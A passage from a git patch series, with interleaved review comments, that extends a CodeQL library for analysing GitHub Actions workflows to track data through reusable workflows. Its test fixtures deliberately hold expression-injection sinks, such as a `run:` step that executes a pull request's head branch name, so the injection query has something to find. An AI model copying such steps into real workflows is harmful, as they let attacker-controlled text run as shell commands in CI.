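Review bot: `viableCallable` in the last hunk resolves a call by plain string equality, `c.getName() = result.getName()`, and the assumption behind that match is not documented. Elsewhere on this page the callable name is the workflow file's path relative to the source root, while the call name is derived from the `uses:` value. A reference of the form `owner/repo/.github/workflows/x.yml@ref`, or a workflow stored below the source root (as the test fixtures are), therefore appears not to resolve. When resolution fails, taint passed through `with:` stops at the call without any diagnostic, which is a false negative for the injection query. I would state the limitation on the predicate, e.g. `/** Resolves by exact name: only a './'-relative reference to a workflow at the source root matches. */`, and add a fixture covering the remote form.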
@@ -173,11 +185,10 @@ class ContentApprox extends TContentApprox { ContentApprox getContentApprox(Content c) { none() } /** - * Not used since we dont have Callables in the AST * Made a string to match the ArgumentPosition type */ class ParameterPosition extends string { - ParameterPosition() { none() } + ParameterPosition() { exists(any(ReusableWorkflowStmt w).getParams().getParamExpr(this)) } } /** @@ -188,18 +199,12 @@ class ArgumentPosition extends string { } /** - * Not really used since we dont have Callables in the AST but needed for the InputSig signature */ predicate parameterMatch(ParameterPosition ppos, ArgumentPosition apos) { ppos = apos } -/** - * a simple local flow step - */ -predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } - -predicate usesOutputDefToUse(Node nodeFrom, Node nodeTo) { +predicate stepUsesOutputDefToUse(Node nodeFrom, Node nodeTo) { // nodeTo is an OutputVarAccessExpr scoped with the namespace of the nodeFrom Step output - exists(UsesExpr uses, StepOutputAccessExpr outputRead | + exists(StepUsesExpr uses, StepOutputAccessExpr outputRead | uses = nodeFrom.asExpr() and outputRead = nodeTo.asExpr() and outputRead.getStepId() = uses.getId() and @@ -233,11 +238,16 @@ predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { */ pragma[nomagic] predicate localFlowStep(Node nodeFrom, Node nodeTo) { - usesOutputDefToUse(nodeFrom, nodeTo) or + stepUsesOutputDefToUse(nodeFrom, nodeTo) or runOutputDefToUse(nodeFrom, nodeTo) or jobOutputDefToUse(nodeFrom, nodeTo) } +/** + * a simple local flow step + */ +predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } + /** * Holds if data can flow from `node1` to `node2` through a non-local step * that does not follow a call edge. For example, a step through a global diff --git a/ql/lib/test/.github/workflows/test.yml b/ql/lib/test/.github/workflows/test.yml index 2760a6c3d35..754105a49e6 100644 
--- a/ql/lib/test/.github/workflows/test.yml +++ b/ql/lib/test/.github/workflows/test.yml @@ -13,7 +13,7 @@ jobs: fetch-depth: 0 - name: Get changed files - id: source + id: source uses: tj-actions/changed-files@v40 - name: Remove foo from changed files @@ -21,8 +21,12 @@ jobs: uses: mad9000/actions-find-and-replace-string@3 with: source: ${{ steps.source.outputs.all_changed_files }} - find: 'foo' - replace: '' + find: "foo" + replace: "" + - id: simplesink1 + run: echo ${{ steps.source.outputs.all_changed_files }} + - id: simplesink2 + run: ${{ github.event.pull_request.head.ref }} job2: runs-on: ubuntu-latest diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 2e358f3c30b..31bcdc256d8 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -12,7 +12,11 @@ query predicate jobNodes(JobStmt s) { any() } query predicate stepNodes(StepStmt s) { any() } -query predicate usesNodes(UsesExpr s) { any() } +query predicate allUsesNodes(UsesExpr s) { any() } + +query predicate stepUsesNodes(StepUsesExpr s) { any() } + +query predicate jobUsesNodes(JobUsesExpr s) { any() } query predicate usesSteps(UsesExpr call, string argname, Expression arg) { call.getArgument(argname) = arg 
@@ -42,17 +46,22 @@ query predicate nonOrphanVarAccesses(ExprAccessExpr va, string var, AstNode pare query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode() = parent } -query predicate cfgNodes(Cfg::Node n) { any() } +query predicate cfgNodes(Cfg::Node n) { + //any() + n.getAstNode() instanceof JobUsesExpr +} -query predicate dfNodes(DataFlow::Node e) { any() } +query predicate dfNodes(DataFlow::Node e) { + e.getLocation().getFile().getBaseName() = "simple1.yml" +} query predicate exprNodes(DataFlow::ExprNode e) { any() } query predicate argumentNodes(DataFlow::ArgumentNode e) { any() } -query predicate localFlow(UsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } +query predicate localFlow(StepUsesExpr s, StepOutputAccessExpr o) { s.getId() = o.getStepId() } -query predicate usesIds(UsesExpr s, string a) { s.getId() = a } +query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } From 3152ed71babc92524cf2f7a326c4f3a212411fad Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 9 Feb 2024 11:57:47 +0100 Subject: [PATCH 0015/1267] dataflow through reusable workflows --- ql/lib/codeql/actions/Ast.qll | 135 +++++++++++++----- ql/lib/codeql/actions/Consistency.ql | 3 + ql/lib/codeql/actions/DataFlow.qll | 8 ++ .../actions/controlflow/internal/Cfg.qll | 43 ++++-- .../codeql/actions/dataflow/FlowSources.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 2 +- .../dataflow/internal/DataFlowPrivate.qll | 78 +++++----- .../dataflow/internal/DataFlowPublic.qll | 42 +++++- .../.github/workflows/calling_workflow.yml | 28 +++- .../.github/workflows/reusable_workflow.yml | 21 ++- ql/lib/test/test.ql | 4 +- .../Security/CWE-094/ExpressionInjection.ql | 1 + ql/src/test/partial.ql | 33 +++++ 13 files changed, 300 insertions(+), 100 deletions(-) create mode 100644 ql/lib/codeql/actions/Consistency.ql create mode 100644 ql/src/test/partial.ql diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 8f8347e766f..b84f884c034 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -39,23 +39,21 @@ class WorkflowStmt extends Statement instanceof Actions::Workflow { } class ReusableWorkflowStmt extends WorkflowStmt { - YamlMapping parameters; + YamlValue workflow_call; ReusableWorkflowStmt() { - exists(Actions::On on | - on.getWorkflow() = this and - on.getNode("workflow_call").(YamlMapping).lookup("inputs") = parameters - ) + this.(Actions::Workflow).getOn().getNode("workflow_call") = workflow_call } - ParamsStmt getParams() { result = parameters } + InputsStmt getInputs() { result = workflow_call.(YamlMapping).lookup("inputs") } + + OutputsStmt getOutputs() { result = workflow_call.(YamlMapping).lookup("outputs") } - // TODO: implemnt callable name string getName() { result = this.getLocation().getFile().getRelativePath() } } -class ParamsStmt extends Statement instanceof YamlMapping { - ParamsStmt() { +class InputsStmt extends Statement instanceof YamlMapping { + InputsStmt() { exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("inputs") = this) } 
@@ -72,12 +70,38 @@ class ParamsStmt extends Statement instanceof YamlMapping { * token: * required: true */ - ParamExpr getParamExpr(string name) { - this.(YamlMapping).maps(any(YamlScalar s | s.getValue() = name), result) + InputExpr getInputExpr(string name) { + result.(YamlString).getValue() = name and + this.(YamlMapping).maps(result, _) } } -class ParamExpr extends Expression instanceof YamlValue { } +class InputExpr extends Expression instanceof YamlString { } + +class OutputsStmt extends Statement instanceof YamlMapping { + OutputsStmt() { + exists(Actions::On on | on.getNode("workflow_call").(YamlMapping).lookup("outputs") = this) + } + + /** + * Gets a specific parameter expression (YamlMapping) by name. + * eg: + * on: + * workflow_call: + * outputs: + * firstword: + * description: "The first output string" + * value: ${{ jobs.example_job.outputs.output1 }} + * secondword: + * description: "The second output string" + * value: ${{ jobs.example_job.outputs.output2 }} + */ + OutputExpr getOutputExpr(string name) { + this.(YamlMapping).lookup(name).(YamlMapping).lookup("value") = result + } +} + +class OutputExpr extends Expression instanceof YamlString { } /** * A Job is a collection of steps that run in an execution environment. @@ -117,8 +141,13 @@ class JobStmt extends Statement instanceof Actions::Job { /** * Reusable workflow jobs may have Uses children + * eg: + * call-job: + * uses: ./.github/workflows/reusable_workflow.yml + * with: + * arg1: value1 */ - JobUsesExpr getUsesExpr() { result = this.(Actions::Job).lookup("uses") } + JobUsesExpr getUsesExpr() { result.getJob() = this } } /** @@ -152,8 +181,11 @@ class StepStmt extends Statement instanceof Actions::Step { JobStmt getJob() { result = super.getJob() } } +/** + * Abstract class representing a call to a 3rd party action or reusable workflow. + */ abstract class UsesExpr extends Expression { - abstract string getTarget(); + abstract string getCallee(); abstract string getVersion(); 
@@ -168,7 +200,7 @@ class StepUsesExpr extends StepStmt, UsesExpr { StepUsesExpr() { uses.getStep() = this } - override string getTarget() { result = uses.getGitHubRepository() } + override string getCallee() { result = uses.getGitHubRepository() } override string getVersion() { result = uses.getVersion() } @@ -183,12 +215,12 @@ class StepUsesExpr extends StepStmt, UsesExpr { /** * A Uses step represents a call to an action that is defined in a GitHub repository. */ -class JobUsesExpr extends UsesExpr instanceof YamlScalar { - JobStmt job; +class JobUsesExpr extends UsesExpr instanceof YamlMapping { + JobUsesExpr() { + this instanceof JobStmt and this.maps(any(YamlString s | s.getValue() = "uses"), _) + } - JobUsesExpr() { job.(YamlMapping).lookup("uses") = this } - - JobStmt getJob() { result = job } + JobStmt getJob() { result = this } /** * Gets a regular expression that parses an `owner/repo@version` reference within a `uses` field in an Actions job step. 
@@ -200,31 +232,31 @@ class JobUsesExpr extends UsesExpr instanceof YamlScalar { private string pathUsesParser() { result = "\\./(.+)" } - override string getTarget() { - exists(string name | - this.(YamlScalar).getValue() = name and - if name.matches("./%") - then result = name.regexpCapture(this.pathUsesParser(), 1) + override string getCallee() { + exists(YamlString name | + this.(YamlMapping).lookup("uses") = name and + if name.getValue().matches("./%") + then result = name.getValue().regexpCapture(this.pathUsesParser(), 1) else result = - name.regexpCapture(this.repoUsesParser(), 1) + "/" + - name.regexpCapture(this.repoUsesParser(), 2) + "/" + - name.regexpCapture(this.repoUsesParser(), 3) + name.getValue().regexpCapture(this.repoUsesParser(), 1) + "/" + + name.getValue().regexpCapture(this.repoUsesParser(), 2) + "/" + + name.getValue().regexpCapture(this.repoUsesParser(), 3) ) } /** Gets the version reference used when checking out the Action, e.g. `v2` in `actions/checkout@v2`. */ override string getVersion() { - exists(string name | - this.(YamlScalar).getValue() = name and - if not name.matches("\\.%") - then result = this.(YamlScalar).getValue().regexpCapture(this.repoUsesParser(), 4) + exists(YamlString name | + this.(YamlMapping).lookup("uses") = name and + if not name.getValue().matches("\\.%") + then result = name.getValue().regexpCapture(this.repoUsesParser(), 4) else none() ) } override Expression getArgument(string key) { - job.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result + this.(YamlMapping).lookup("with").(YamlMapping).lookup(key) = result } } @@ -287,6 +319,7 @@ class StepOutputAccessExpr extends ExprAccessExpr { /** * A ExprAccessExpr where the expression evaluated is a job output read. * eg: `${{ needs.job1.outputs.foo}}` + * eg: `${{ jobs.job1.outputs.foo}}` (for reusable workflows) */ class JobOutputAccessExpr extends ExprAccessExpr { string jobId; 
@@ -294,9 +327,11 @@ class JobOutputAccessExpr extends ExprAccessExpr { JobOutputAccessExpr() { jobId = - this.getExpression().regexpCapture("needs\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 1) and + this.getExpression() + .regexpCapture("(needs|jobs)\\.([A-Za-z0-9_-]+)\\.outputs\\.[A-Za-z0-9_-]+", 2) and varName = - this.getExpression().regexpCapture("needs\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 1) + this.getExpression() + .regexpCapture("(needs|jobs)\\.[A-Za-z0-9_-]+\\.outputs\\.([A-Za-z0-9_-]+)", 2) } string getVarName() { result = varName } @@ -305,7 +340,35 @@ class JobOutputAccessExpr extends ExprAccessExpr { exists(JobStmt job | job.getId() = jobId and job.getLocation().getFile() = this.getLocation().getFile() and - job.getOutputStmt().getOutputExpr(varName) = result + ( + // A Job can have multiple outputs, so we need to check both + // jobs..outputs. + job.getOutputStmt().getOutputExpr(varName) = result + or + // jobs..uses (variables returned from the reusable workflow + job.getUsesExpr() = result + ) + ) + } +} + +/** + * A ExprAccessExpr where the expression evaluated is a reusable workflow input read. + * eg: `${{ inputs.foo}}` + */ +class ReusableWorkflowInputAccessExpr extends ExprAccessExpr { + string paramName; + + ReusableWorkflowInputAccessExpr() { + paramName = this.getExpression().regexpCapture("inputs\\.([A-Za-z0-9_-]+)", 1) + } + + string getParamName() { result = paramName } + + Expression getInputExpr() { + exists(ReusableWorkflowStmt w | + w.getLocation().getFile() = this.getLocation().getFile() and + w.getInputs().getInputExpr(paramName) = result ) } } diff --git a/ql/lib/codeql/actions/Consistency.ql b/ql/lib/codeql/actions/Consistency.ql new file mode 100644 index 00000000000..fa3a2bc9e5c --- /dev/null +++ b/ql/lib/codeql/actions/Consistency.ql @@ -0,0 +1,3 @@ +import DataFlow::DataFlow::Consistency + + 
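Review bot: In the second Ast.qll hunk the new disjunct `job.getUsesExpr() = result` does not mention `varName`, so any `needs.JOB.outputs.NAME` read on a job that calls a reusable workflow resolves to the whole call, whether or not the workflow declares an output called NAME. That over-approximation may be intended as a first step, but it means an undeclared or misspelled output name is still treated as carrying the call's taint. I would say so in the comment, e.g. `// over-approximation: every output read maps to the call itself; the output name is not checked against the callee's outputs`. The two comment lines above the disjuncts have also lost their placeholders ("jobs..outputs.") and should name the job id and output again. The predicate's signature is outside the hunk.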
diff --git a/ql/lib/codeql/actions/DataFlow.qll b/ql/lib/codeql/actions/DataFlow.qll index d1e714e8fbc..5040865be1d 100644 --- a/ql/lib/codeql/actions/DataFlow.qll +++ b/ql/lib/codeql/actions/DataFlow.qll @@ -7,4 +7,12 @@ module DataFlow { private import codeql.actions.dataflow.internal.DataFlowImplSpecific import DataFlowMake import codeql.actions.dataflow.internal.DataFlowPublic + + /** debug */ + private import codeql.actions.dataflow.internal.TaintTrackingImplSpecific + import codeql.dataflow.internal.DataFlowImplConsistency as DFIC + module ActionsConsistency implements DFIC::InputSig { } + module Consistency { + import DFIC::MakeConsistency + } } diff --git a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll index ac8ab616e3e..057d7872ee3 100644 --- a/ql/lib/codeql/actions/controlflow/internal/Cfg.qll +++ b/ql/lib/codeql/actions/controlflow/internal/Cfg.qll @@ -87,9 +87,9 @@ module Completion { module CfgScope { abstract class CfgScope extends AstNode { } - private class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } + class ReusableWorkflowScope extends CfgScope instanceof ReusableWorkflowStmt { } - private class JobScope extends CfgScope instanceof JobStmt { } + class JobScope extends CfgScope instanceof JobStmt { } } private module Implementation implements CfgShared::InputSig { @@ -123,7 +123,7 @@ private module Implementation implements CfgShared::InputSig { int maxSplits() { result = 0 } predicate scopeFirst(CfgScope scope, AstNode e) { - first(scope.(ReusableWorkflowStmt).getParams(), e) or + first(scope.(ReusableWorkflowStmt).getInputs(), e) or first(scope.(JobStmt), e) } 
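Review bot: `scopeFirst` in the last Cfg.qll hunk takes the entry of a reusable-workflow scope from `getInputs()`, so a workflow whose `workflow_call` declares no `inputs` appears to get no entry node at all. This commit also widens `ReusableWorkflowStmt` to every workflow with a `workflow_call` trigger, so such scopes now exist. Their `outputs` expressions would then presumably never become CFG nodes, and the `ReturnNode`s built on them would be missing. Since `ReusableWorkflowTree` is a pre-order tree over both inputs and outputs, entering at the workflow itself looks safer: `first(scope.(ReusableWorkflowStmt), e) or`. The enclosing module continues outside the hunk.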
@@ -148,14 +148,11 @@ private import Completion private import CfgScope private class ReusableWorkflowTree extends StandardPreOrderTree instanceof ReusableWorkflowStmt { - override ControlFlowTree getChildNode(int i) { result = super.getParams() and i = 0 } -} - -private class ReusableWorkflowParamsTree extends StandardPreOrderTree instanceof ParamsStmt { override ControlFlowTree getChildNode(int i) { result = rank[i](Expression child, Location l | - child = super.getParamExpr(_) and l = child.getLocation() + (child = super.getInputs() or child = super.getOutputs()) and + l = child.getLocation() | child order by @@ -164,7 +161,35 @@ private class ReusableWorkflowParamsTree extends StandardPreOrderTree instanceof } } -private class ParamExprTree extends LeafTree instanceof ParamExpr { } +private class ReusableWorkflowInputsTree extends StandardPreOrderTree instanceof InputsStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getInputExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class InputExprTree extends LeafTree instanceof InputExpr { } + +private class ReusableWorkflowOutputsTree extends StandardPreOrderTree instanceof OutputsStmt { + override ControlFlowTree getChildNode(int i) { + result = + rank[i](Expression child, Location l | + child = super.getOutputExpr(_) and l = child.getLocation() + | + child + order by + l.getStartLine(), l.getStartColumn(), l.getEndColumn(), l.getEndLine(), child.toString() + ) + } +} + +private class OutputExprTree extends LeafTree instanceof OutputExpr { } private class JobTree extends StandardPreOrderTree instanceof JobStmt { override ControlFlowTree getChildNode(int i) { diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index b2ab51e28fa..3e6a6141767 100644 
--- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -127,7 +127,7 @@ private class EventSource extends RemoteFlowSource { private class ChangedFilesSource extends RemoteFlowSource { ChangedFilesSource() { exists(UsesExpr uses | - uses.getTarget() = "tj-actions/changed-files" and + uses.getCallee() = "tj-actions/changed-files" and uses.getVersion() = ["v10", "v20", "v30", "v40"] and uses = this.asExpr() ) diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 223ff305ba4..ead312d8af6 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll @@ -26,7 +26,7 @@ class AdditionalTaintStep extends Unit { private class ActionsFindAndReplaceStringStep extends AdditionalTaintStep { override predicate step(DataFlow::Node pred, DataFlow::Node succ) { exists(UsesExpr u | - u.getTarget() = "mad9000/actions-find-and-replace-string" and + u.getCallee() = "mad9000/actions-find-and-replace-string" and pred.asExpr() = u.getArgument(["source", "replace"]) and succ.asExpr() = u ) diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll index 1e6fbd5b854..02b7de847e3 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPrivate.qll 
@@ -6,38 +6,7 @@ private import codeql.actions.controlflow.BasicBlocks private import DataFlowPublic cached -newtype TNode = - TExprNode(DataFlowExpr e) or - TParameterNode(ParamExpr p) { p = any(ReusableWorkflowStmt w).getParams().getParamExpr(_) } or - TReturningNode(Cfg::Node n) { n.getAstNode() = any(JobStmt j).getOutputStmt().getOutputExpr(_) } - -/** - * Reusable workflow input nodes - */ -class ParameterNode extends Node, TParameterNode { - private ParamExpr parameter; - - ParameterNode() { this = TParameterNode(parameter) } - - predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { - parameter = c.(ReusableWorkflowStmt).getParams().getParamExpr(pos) - } - - override string toString() { result = parameter.toString() } - - override Location getLocation() { result = parameter.getLocation() } - - ParamExpr getParameter() { result = parameter } -} - -/** - * Reusable workflow output nodes - */ -class ReturnNode extends Node { - ReturnNode() { none() } - - ReturnKind getKind() { none() } -} +newtype TNode = TExprNode(DataFlowExpr e) class OutNode extends ExprNode { private DataFlowCall call; @@ -76,6 +45,8 @@ predicate isArgumentNode(ArgumentNode arg, DataFlowCall call, ArgumentPosition p DataFlowCallable nodeGetEnclosingCallable(Node node) { node = TExprNode(any(DataFlowExpr e | result = e.getScope())) + // node = TReturningNode(any(Cfg::Node n | result = n.getScope())) + // node = TParameterNode(any(InputExpr p | p = result.(ReusableWorkflowStmt).getInputs().getInputExpr(_))) } DataFlowType getNodeType(Node node) { any() } 
@@ -97,21 +68,27 @@ class DataFlowCall instanceof Cfg::Node { Location getLocation() { result = super.getLocation() } - string getName() { result = super.getAstNode().(UsesExpr).getTarget() } + string getName() { result = super.getAstNode().(UsesExpr).getCallee() } DataFlowCallable getEnclosingCallable() { result = super.getScope() } } /** * A Cfg scope that can be called - * ReusableWorkflowStmt */ -class DataFlowCallable instanceof ReusableWorkflowStmt { +class DataFlowCallable instanceof Cfg::CfgScope { string toString() { result = super.toString() } Location getLocation() { result = super.getLocation() } - string getName() { result = super.getName() } + string getName() { + if this instanceof ReusableWorkflowStmt + then result = this.(ReusableWorkflowStmt).getName() + else + if this instanceof JobStmt + then result = this.(JobStmt).getId() + else none() + } } newtype TReturnKind = TNormalReturn() @@ -188,7 +165,7 @@ ContentApprox getContentApprox(Content c) { none() } * Made a string to match the ArgumentPosition type */ class ParameterPosition extends string { - ParameterPosition() { exists(any(ReusableWorkflowStmt w).getParams().getParamExpr(this)) } + ParameterPosition() { exists(any(ReusableWorkflowStmt w).getInputs().getInputExpr(this)) } } /** 
@@ -231,20 +208,25 @@ predicate jobOutputDefToUse(Node nodeFrom, Node nodeTo) { ) } +predicate reusableWorkflowInputDefToUse(Node nodeFrom, Node nodeTo) { + // nodeTo is a ReusableWorkflowInputAccessExpr and nodeFrom is the ReusableWorkflowStmt corresponding parameter expression + exists(Expression astFrom, ReusableWorkflowInputAccessExpr astTo | + astFrom = nodeFrom.asExpr() and + astTo = nodeTo.asExpr() and + astTo.getInputExpr() = astFrom + ) +} + /** * Holds if there is a local flow step from `nodeFrom` to `nodeTo`. * For Actions, we dont need SSA nodes since it should be already in SSA form * Local flow steps are always between two nodes in the same Cfg scope (job definition). */ pragma[nomagic] -predicate localFlowStep(Node nodeFrom, Node nodeTo) { - stepUsesOutputDefToUse(nodeFrom, nodeTo) or - runOutputDefToUse(nodeFrom, nodeTo) or - jobOutputDefToUse(nodeFrom, nodeTo) -} +predicate localFlowStep(Node nodeFrom, Node nodeTo) { none() } /** - * a simple local flow step + * a simple local flow step that should always preserve the call context (same callable) */ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFrom, nodeTo) } @@ -252,8 +234,16 @@ predicate simpleLocalFlowStep(Node nodeFrom, Node nodeTo) { localFlowStep(nodeFr * Holds if data can flow from `node1` to `node2` through a non-local step * that does not follow a call edge. For example, a step through a global * variable. + * We throw away the call context and let us jump to any location + * AKA teleport steps + * local steps are preferible since they are more predictable and easier to control */ -predicate jumpStep(Node node1, Node node2) { none() } +predicate jumpStep(Node nodeFrom, Node nodeTo) { + stepUsesOutputDefToUse(nodeFrom, nodeTo) or + runOutputDefToUse(nodeFrom, nodeTo) or + jobOutputDefToUse(nodeFrom, nodeTo) or + reusableWorkflowInputDefToUse(nodeFrom, nodeTo) +} /** * Holds if data can flow from `node1` to `node2` via a read of `c`. Thus, 
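Review bot: The doc comment kept above `localFlowStep` still describes steps "between two nodes in the same Cfg scope", but the predicate body is now `none()` and every def-to-use edge has moved to `jumpStep`. Jump steps discard the call context, as the new comment on `jumpStep` says, so in principle a value entering a reusable workflow from one caller can be reported as reaching outputs read by a different caller. That may be an acceptable over-approximation for now, but the comment should state it rather than describe behaviour that no longer exists. I would replace the old text with `* Intentionally empty: all def-to-use edges are modelled as jump steps, which are call-context insensitive.`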
diff --git a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll index 41be90718d8..80f504963b9 100644 --- a/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll +++ b/ql/lib/codeql/actions/dataflow/internal/DataFlowPublic.qll @@ -44,6 +44,28 @@ class ExprNode extends Node, TExprNode { override AstNode asExpr() { result = expr.getAstNode() } } +/** + * Reusable workflow input nodes + */ +class ParameterNode extends ExprNode { + private InputExpr parameter; + + ParameterNode() { + this.asExpr() = parameter and + parameter = any(ReusableWorkflowStmt w).getInputs().getInputExpr(_) + } + + predicate isParameterOf(DataFlowCallable c, ParameterPosition pos) { + parameter = c.(ReusableWorkflowStmt).getInputs().getInputExpr(pos) + } + + override string toString() { result = parameter.toString() } + + override Location getLocation() { result = parameter.getLocation() } + + InputExpr getInputExpr() { result = parameter } +} + /** * An argument to a Uses step (call) */ 
@@ -51,12 +73,30 @@ class ArgumentNode extends ExprNode { ArgumentNode() { this.getCfgNode().getAstNode() = any(UsesExpr e).getArgument(_) } predicate argumentOf(DataFlowCall call, ArgumentPosition pos) { - this.getCfgNode() = call.(Cfg::Node).getAPredecessor+() and + this.getCfgNode() = call.(Cfg::Node).getASuccessor+() and call.(Cfg::Node).getAstNode() = any(UsesExpr e | e.getArgument(pos) = this.getCfgNode().getAstNode()) } } +/** + * Reusable workflow output nodes + */ +class ReturnNode extends ExprNode { + private Cfg::Node node; + + ReturnNode() { + this.getCfgNode() = node and + node.getAstNode() = any(ReusableWorkflowStmt w).getOutputs().getOutputExpr(_) + } + + ReturnKind getKind() { result = TNormalReturn() } + + override string toString() { result = "return " + node.toString() } + + override Location getLocation() { result = node.getLocation() } +} + /** Gets the node corresponding to `e`. */ Node exprNode(DataFlowExpr e) { result = TExprNode(e) } diff --git a/ql/lib/test/.github/workflows/calling_workflow.yml b/ql/lib/test/.github/workflows/calling_workflow.yml index 3b0ab8f18d3..9aafe1189ef 100644 --- a/ql/lib/test/.github/workflows/calling_workflow.yml +++ b/ql/lib/test/.github/workflows/calling_workflow.yml 
@@ -1,18 +1,38 @@ -on: push +name: Call a reusable workflow and use its outputs + +on: + workflow_dispatch: jobs: - call-workflow-1-in-local-repo: + call1: uses: octo-org/this-repo/.github/workflows/reusable_workflow.yml@172239021f7ba04fe7327647b213799853a9eb89 with: config-path: ${{ github.event.pull_request.head.ref }} secrets: inherit - call-workflow-2-in-local-repo: + call2: uses: ./.github/workflows/reusable_workflow.yml with: config-path: ${{ github.event.pull_request.head.ref }} secrets: inherit - call-workflow-in-another-repo: + call3: uses: octo-org/another-repo/.github/workflows/workflow.yml@v1 with: config-path: ${{ github.event.pull_request.head.ref }} secrets: inherit + + job1: + runs-on: ubuntu-latest + needs: call1 + steps: + - run: echo ${{ needs.call1.outputs.workflow-output }} + job2: + runs-on: ubuntu-latest + needs: call2 + steps: + - run: echo ${{ needs.call2.outputs.workflow-output1 }} + - run: echo ${{ needs.call2.outputs.workflow-output2 }} + job3: + runs-on: ubuntu-latest + needs: call3 + steps: + - run: echo ${{ needs.call3.outputs.workflow-output }} diff --git a/ql/lib/test/.github/workflows/reusable_workflow.yml b/ql/lib/test/.github/workflows/reusable_workflow.yml index f31c8a63d74..45c177edecb 100644 --- a/ql/lib/test/.github/workflows/reusable_workflow.yml +++ b/ql/lib/test/.github/workflows/reusable_workflow.yml 
@@ -6,13 +6,28 @@ on: config-path: required: true type: string + outputs: + workflow-output1: + value: ${{ jobs.job1.outputs.job-output1 }} + workflow-output2: + value: ${{ jobs.job1.outputs.job-output2 }} secrets: token: required: true jobs: - triage: + job1: runs-on: ubuntu-latest + outputs: + job-output1: ${{ steps.step1.outputs.step-output}} + job-output2: ${{ steps.step2.outputs.all_changed_files}} steps: - - id: sink - run: echo ${{ inputs.config-path }} + - id: step1 + env: + CONFIG_PATH: ${{ inputs.config-path }} + run: | + echo ${{ inputs.config-path }} + echo "::set-output name=step-output:: $CONFIG_PATH" + - name: Get changed files + id: step2 + uses: tj-actions/changed-files@v40 diff --git a/ql/lib/test/test.ql b/ql/lib/test/test.ql index 31bcdc256d8..8d558cbaacd 100644 --- a/ql/lib/test/test.ql +++ b/ql/lib/test/test.ql @@ -48,7 +48,7 @@ query predicate parentNodes(AstNode child, AstNode parent) { child.getParentNode query predicate cfgNodes(Cfg::Node n) { //any() - n.getAstNode() instanceof JobUsesExpr + n.getAstNode() instanceof OutputsStmt } query predicate dfNodes(DataFlow::Node e) { @@ -66,3 +66,5 @@ query predicate usesIds(StepUsesExpr s, string a) { s.getId() = a } query predicate varIds(StepOutputAccessExpr s, string a) { s.getStepId() = a } query predicate nodeLocations(DataFlow::Node n, Location l) { n.getLocation() = l } + +query predicate scopes(Cfg::CfgScope c) { any() } diff --git a/ql/src/Security/CWE-094/ExpressionInjection.ql b/ql/src/Security/CWE-094/ExpressionInjection.ql index 4af1e2c286a..2fe6f17dfb6 100644 --- a/ql/src/Security/CWE-094/ExpressionInjection.ql +++ b/ql/src/Security/CWE-094/ExpressionInjection.ql 
@@ -24,6 +24,7 @@ private module MyConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof ExpressionInjectionSink } + //predicate isSink(DataFlow::Node sink) { any() } //predicate neverSkip(DataFlow::Node node) { any() } } diff --git a/ql/src/test/partial.ql b/ql/src/test/partial.ql new file mode 100644 index 00000000000..779749f82f6 --- /dev/null +++ b/ql/src/test/partial.ql @@ -0,0 +1,33 @@ +/** + * @name Forward Partial Dataflow + * @description Forward Partial Dataflow + * @kind path-problem + * @precision low + * @problem.severity error + * @id actions/test-dataflow + */ + +import actions +import codeql.actions.TaintTracking +import codeql.actions.dataflow.FlowSources +import PartialFlow::PartialPathGraph + +private module MyConfig implements DataFlow::ConfigSig { + predicate isSource(DataFlow::Node source) { + source instanceof RemoteFlowSource and + source.getLocation().getFile().getBaseName() = "calling_workflow.yml" + } + + predicate isSink(DataFlow::Node sink) { none() } +} + +private module MyFlow = TaintTracking::Global; // or DataFlow::Global<..> + +int explorationLimit() { result = 10 } + +private module PartialFlow = MyFlow::FlowExplorationFwd; + +from PartialFlow::PartialPathNode source, PartialFlow::PartialPathNode sink +where PartialFlow::partialFlow(source, sink, _) +select sink.getNode(), source, sink, "This node receives 